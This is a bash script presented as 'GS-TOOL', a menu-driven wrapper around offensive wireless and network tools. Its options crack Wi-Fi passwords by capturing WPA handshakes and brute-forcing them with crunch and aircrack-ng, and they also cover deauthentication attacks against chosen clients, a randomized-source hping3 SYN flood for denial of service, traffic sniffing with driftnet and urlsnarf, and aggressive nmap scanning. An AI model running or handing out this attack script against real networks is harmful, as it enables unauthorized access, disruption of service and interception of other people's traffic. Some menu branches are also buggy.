#!/bin/bash 
clear



echo
echo -e "\e[1;34m   ____ ____      _____ ___   ___  _      "
echo -e "\e[1;34m  / ___/ ___|    |_   _/ _ \ / _ \| |     "
echo -e "\e[1;37m | |  _\___ \ _____| || | | | | | | |     "
echo -e "\e[1;31m | |_| |___) |_____| || |_| | |_| | |___  "
echo -e "\e[1;31m  \____|____/      |_| \___/ \___/|_____| "
echo    
echo   by get-sum
echo  ------------
echo                insta get_sum_.__
echo                ------------------
echo
echo ENTER
echo
read -p 'gs-tool : ' choix1

clear








while [ test ]
do


echo    -e "\e[1;34m       ----------- "
echo      -e "\e[1;37m        GS-TOOL "
echo    -e "\e[1;31m       -----------"
echo -e " \e[1;36m by get-sum"
echo                 " ------------"
echo 
echo -e ' \e[1;31m '
echo 
read -p 'gs-tool : ' choix




if [ $choix = "monitor" ]

then
echo -e "\e[1;35m        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo
echo -e "\e[1;31m           monitor mode    for tp-link TL-WN722N , alpha network ect "
echo -e "\e[1;35m        ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
echo              
echo -e "$\e[1;33m   by get-sum"
echo              " ------------"
airmon-ng check kill
echo [OK] check kill
airmon-ng start wlan0
echo [OK] start wlan0 
ifconfig wlan0 up
echo [OK] wlan0 up
ifconfig eth0 down
echo [OK] eth0 down
iwconfig wlan0 mode monitor
echo [OK] wlan0 mode monitor
iwconfig wlan0
clear 
 
read -p 'interface : ' interface 


xterm -hold -e airodump-ng $interface
fi



if [ $choix = "help" ]
then
clear
echo -e "\e[1;35m "
echo    ---------------
echo     clear : clear 
echo '  ---------------------------------------------------------------------  '
echo '  [+] monitoring mode : monitor      | [+] siffing : sniff   '
echo '  ---------------------------------------------------------------------  '
echo '  [+] network scan : nc              | [+] crack handshake : crh   '
echo '  ---------------------------------------------------------------------  '
echo '  [+] ports scan : pscan (nmap)      | [+] Deauthentication Attack : da     '
echo '  ---------------------------------------------------------------------  '
echo '  [+] denial of service : dos           '
echo '  ------------------------------------  '
echo '  [+] retrival of handshake : crack     '
echo '  ------------------------------------  '
echo '  [+] install dependances :ind          '
echo '  ------------------------------------  '

fi



if [ $choix = "clear" ]
then
clear
fi



if [ $choix = "exit" ]
then 
exit
fi

if [ $choix = "nc" ]
then


clear
echo -e "\e[1;31m       "
echo   "-----------------"
echo   "   NeTwoRk ScAn  "
echo   "-----------------"
echo
echo
xterm -hold -e netdiscover
fi




if [ $choix = "pscan" ]
then 
clear
echo
echo -e "\e[1;33m "
echo   ------------------------
echo      - ports scaner -
echo   ------------------------
echo 
echo
echo -e ' \e[1;31m '

read -p ' ip de la machine : ' ipm

nmap -sV -v -Pn -sT -PN -T4 -O -F -A --version-ligh $ipm
fi



if [ $choix = "crack" ]
then
clear
read -p 'interface : ' winterface
airodump-ng $winterface
clear
echo
echo -e '\e[1;33m '
echo choose acces point
echo 
echo -e ' \e[1;31m '
read -p 'bssid: ' apbssid
read -p 'chanel : ' apch
xterm -e airodump-ng -c $apch --bssid $apbssid -w gs-tool.cap $winterface
clear

fi



if [ $choix = "dos" ]
then
clear
echo
echo
echo   --------------------
echo     DeNiAl-Of-SeRvIcE
echo   --------------------
echo
echo
echo
echo
echo
echo
echo
echo -e  '\e[1;31m '
read -p 'ip : ' ipdos
xterm -e hping3 -c 100000 -d 120 -S -w 64 -p 21 --flood --rand-source $ipdos
fi









if [ choix = "ls" ]
then
ls
fi


if [ choix = "shell" ]
then
exit
fi




if [ $choix = "ind" ]
then 
clear
apt-get update
apt-get install xterm
echo -e  '\e[1;32m '
echo [OK] XTERM
echo -e  '\e[1;30m '
apt-get install hping3
echo -e  '\e[1;32m '
echo [OK] hping3
apt-get install aircrack-ng
apt install nmap
apt-get install driftnet
apt-get install urlsnarf
echo '[end]'
fi



if [ choix = "sniff" ]
then
clear
echo 
echo -----------------------
echo    - sniffing mitm -
echo -----------------------
echo
read -p 'interface : 'interfacesn
read -p 'ip : ' ipsn
driftnet -i $interfacesn $ipsn
xterm urlsnarf -i $interfacesn $ipsn
fi







if [ $choix = "crh" ]
then
clear
echo ------------------
echo   crack handshake
echo  - aircrack-ng -
echo ------------------
echo file.cap
read -p 'file : ' capcr
echo
echo bssid of ap
echo
read -p 'bssid : ' bssidcr
echo
echo wep :1  or wpa:2
echo
read -p 'sercurity : ' ecript
crunch 8 25 azertyuioqsdfghjklmwxcvbn01234567890 | aircrack-ng -w - -b $bssidcr -a $ecript $capcr
fi


if [ $choix = "msf" ]
then
xterm -e msfconsole
fi


if [ $choix = "shark" ]
then
wireshark
fi






if [ $choix = "da" ]
then
clear
echo -------------------------
echo  Deauthentication Attack
echo  - need monitor monde -
echo -------------------------
echo ap bssid
read -p  'bssid : ' bssidda
echo
echo mac address client
echo
read -p 'mac add :' macda
echo
echo interface
echo
read -p ' interface : ' interfaceda

clear
echo -e  '\e[1;32m '
echo attack started ... 
xterm -e aireplay-ng -0 122222 -a $bssidda -c $macda $interfaceda
fi



done

